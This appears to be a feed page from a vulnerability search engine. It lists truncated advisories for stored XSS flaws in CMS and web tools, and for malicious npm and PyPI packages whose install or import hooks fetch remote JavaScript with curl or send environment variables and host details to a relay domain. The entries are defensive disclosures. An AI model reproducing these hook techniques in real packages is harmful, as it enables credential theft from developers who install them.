CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

Veracode•added 2026/05/23 6:13 a.m.•8 views

Cross-site Scripting (XSS)

ci4-cms-erp/ci4ms is vulnerable to Cross-site Scripting XSS. The vulnerability is due to improper sanitization and escaping of user-supplied page content before rendering, which allows an attacker to inject malicious scripts that execute in the browsers of visitors and administrators viewing the...

5.9AI score

Exploits0References3Affected Software1

OSSF Malicious Packages•added 2026/05/23 2:17 a.m.•9 views

Malicious code in dds-js-idl-types (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 68e8941c301603919022f1d67d311d576d5d5efcac7ed7cb0d3526cb71e829d6 On npm install, the package's postinstall.js runs whoami and reads os.hostname, os.platform, the current working directory, and CI-related environmen...

NVD•added 2026/05/22 10:16 p.m.•8 views

CVE-2026-41147

NukeViet CMS is a multi Content Management System. Versions 4.5.07 and prior contain a Stored Cross-Site Scripting XSS vulnerability caused by insufficient server-side input sanitization in the Request class. The application relies primarily on client-side filtering to sanitize HTML tags and...

8.7CVSS0.00055EPSS

Exploits0References3

OSSF Malicious Packages•added 2026/05/22 8:31 p.m.•6 views

Malicious code in solidity-build-guard (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector be62d73f7e4a6307ec5f0bac9b9543f9d73da696a4e67233057f77fd3cb6481c On import soliditybuildguard, the top-level init.py lines 11-24 shells out to curl to download a JavaScript file from a personal GitHub Pages URL...

OSV•added 2026/05/22 8:31 p.m.•1 views

MAL-2026-4262 Malicious code in solidity-build-guard (PyPI)

OSSF Malicious Packages•added 2026/05/22 8:31 p.m.•6 views

Malicious code in defi-risk-scanner (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5a8385c44127ab4250664e1324009461ae329e3684948d692cc679962d59f818 On first import defiriskscanner, the package's top-level init.py unconditionally runs curl -sL...

OSV•added 2026/05/22 8:31 p.m.•4 views

MAL-2026-4260 Malicious code in defi-risk-scanner (PyPI)

OSV•added 2026/05/22 8:30 p.m.•4 views

MAL-2026-4261 Malicious code in eth-security-auditor (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8e20bc5304d65563ad8b577a38c26db0b04746828b554f88cf5dd1215a214cf1 On import, ethsecurityauditor/init.py unconditionally fetches a JavaScript payload from...

6.4AI score

OSSF Malicious Packages•added 2026/05/22 8:30 p.m.•4 views

Malicious code in cryptowallet-safety (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 276a350e78e2602882e107586e33d617b3e392e3943c120d99d4213963d7fd9d On import cryptowalletsafety, the top-level init.py lines 13-21 shells out to curl -sL...

5.9AI score

EUVD•added 2026/05/22 7:29 p.m.•11 views

EUVD-2026-31496

Mantis Bug Tracker MantisBT is an open source issue tracker. In versions 2.28.1 and below, given any pre-existing XSS / HTML injection vulnerability, an attacker can bypass the Content Security Policy's script-src directive by uploading a crafted attachment to any issue that, when accessed via th...

7.6CVSS5.7AI score0.00071EPSS

Exploits0References3

OSSF Malicious Packages•added 2026/05/22 6:46 p.m.•7 views

Malicious code in peertube-plugin-google-analytics-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3c66b6ebad55556f956fbc181293327eb4051d2ec6de6436a24d027fac58e580 This PeerTube plugin advertises itself as a Google Analytics integration but its client-side script client/common-client-plugin.js:8 registers a...

OSV•added 2026/05/22 6:46 p.m.•2 views

MAL-2026-4636 Malicious code in peertube-plugin-google-analytics-js (npm)

5.9AI score

EUVD•added 2026/05/22 6:26 p.m.•6 views

EUVD-2026-31481

TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the fix for GHSA-4xc5-wfwc-jw47 "Credential Theft via Client-Side Script Execution and API Authorization Bypass" is incomplete. While the builder's getCredentials tRPC endpoint was patched with workspace membership checks, the...

7.1CVSS5.8AI score0.00041EPSS

Exploits0References3

EUVD•added 2026/05/22 5:55 p.m.•4 views

EUVD-2026-31478

TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain a critical stored XSS vulnerability in the app.typebot.io profile picture upload form. The application fails to sanitize or restrict SVG/XML-based uploads and directly renders them when accessed through the domain. By uploading ...

8.5CVSS6AI score0.00052EPSS

OSV•added 2026/05/22 4:40 p.m.•3 views

MAL-2026-4692 Malicious code in thevoid (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ce4d125de5d699da897d074134f8d1f0a971aa23d9c3d6ff3330015fccad091 On install, postinstall.js performs an HTTPS request to void-relay.com carrying process.env contents along with host identifiers process.platform,...

OSSF Malicious Packages•added 2026/05/22 1:52 p.m.•9 views

Malicious code in osep-api-hub-service-client-v1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cd131719d20e013a4627e1ea402ffc26135d66a5d6dd35669b8a3a6fb85e5f76 package.json declares "preinstall": "node index.js", causing index.js to run automatically on npm install. index.js collects host identifiers —...

OSSF Malicious Packages•added 2026/05/22 1:21 p.m.•6 views

Malicious code in share-anything-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 290f9dadaf589349dd8a7c641450aca713a6ead63b2ba685c15e4e6a37ab3b07 The package's package.json declares a postinstall lifecycle hook "postinstall": "node install.js" that runs install.js automatically on npm install...

OSV•added 2026/05/22 1:21 p.m.•3 views

MAL-2026-4668 Malicious code in share-anything-cli (npm)